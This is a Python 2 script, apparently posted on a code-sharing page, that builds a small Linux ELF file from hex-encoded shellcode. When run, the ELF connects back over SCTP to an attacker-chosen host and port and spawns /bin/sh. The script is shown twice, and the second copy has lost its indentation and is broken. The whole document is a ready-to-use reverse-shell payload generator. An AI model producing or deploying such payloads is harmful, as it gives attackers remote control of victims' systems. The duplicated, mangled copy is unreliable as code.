0x27/elfgen-sctp.py

## elfgen-sctp.py
#!/usr/bin/python2
# coding: utf-8
# sctp backconnect elf generator v1.0
import socket
import struct
import sys

def make_shellcode(cb_host, cb_port):
    sc = "7f454c4602010100000000000000000002003e00010000007800400000000000"
    sc += "400000000000000000000000000000000000000040003800010000000000000"
    sc += "001000000050000000000000000000000000040000000000000004000000000"
    sc += "00f500000000000000f5000000000000000000200000000000e9080000002f6"
    sc += "2696e2f736800b929000000bf02000000be01000000ba8400000089c80f0589"
    sc += "c766c74424f0020066c74424f20539c74424f4c0a80aaf488d7424f0b210b82"
    sc += "a0000000f05b22131f689d00f0540b60189d00f0540b60289d00f05488d3d9d"
    sc += "ffffff31f631d2b83b0000000f0531ffb83c0000000f05c3"
    sc = sc.replace("c0a80aaf", socket.inet_aton(cb_host).encode("hex"))
    sc = sc.replace("0539", struct.pack(">H", int(cb_port)).encode("hex"))
    return sc.decode('hex')


def main(args):
    print "SCTP Backconnect ELF Generator v1.0 - skyhighatrist"
    if len(args) != 4:
        sys.exit("use: %s cb_host cb_port elfout" %(args[0]))
    print "{+} Generating Backconnect with Callback: %s:%s" %(args[1], args[2])
    cback = make_shellcode(cb_host=args[1], cb_port=args[2])
    print "{+} Writing ELF to %s" %(args[3])
    f = open(args[3], "wb")
    f.write(cback)
    f.close()

if __name__ == "__main__":
    main(args=sys.argv)
	#!/usr/bin/python2
	# coding: utf-8
	# sctp backconnect elf generator v1.0
	import socket
	import struct
	import sys

	def make_shellcode(cb_host, cb_port):
	sc = "7f454c4602010100000000000000000002003e00010000007800400000000000"
	sc += "400000000000000000000000000000000000000040003800010000000000000"
	sc += "001000000050000000000000000000000000040000000000000004000000000"
	sc += "00f500000000000000f5000000000000000000200000000000e9080000002f6"
	sc += "2696e2f736800b929000000bf02000000be01000000ba8400000089c80f0589"
	sc += "c766c74424f0020066c74424f20539c74424f4c0a80aaf488d7424f0b210b82"
	sc += "a0000000f05b22131f689d00f0540b60189d00f0540b60289d00f05488d3d9d"
	sc += "ffffff31f631d2b83b0000000f0531ffb83c0000000f05c3"
	sc = sc.replace("c0a80aaf", socket.inet_aton(cb_host).encode("hex"))
	sc = sc.replace("0539", struct.pack(">H", int(cb_port)).encode("hex"))
	return sc.decode('hex')



	def main(args):
	print "SCTP Backconnect ELF Generator v1.0 - skyhighatrist"
	if len(args) != 4:
	sys.exit("use: %s cb_host cb_port elfout" %(args[0]))
	print "{+} Generating Backconnect with Callback: %s:%s" %(args[1], args[2])
	cback = make_shellcode(cb_host=args[1], cb_port=args[2])
	print "{+} Writing ELF to %s" %(args[3])
	f = open(args[3], "wb")
	f.write(cback)
	f.close()

	if __name__ == "__main__":
	main(args=sys.argv)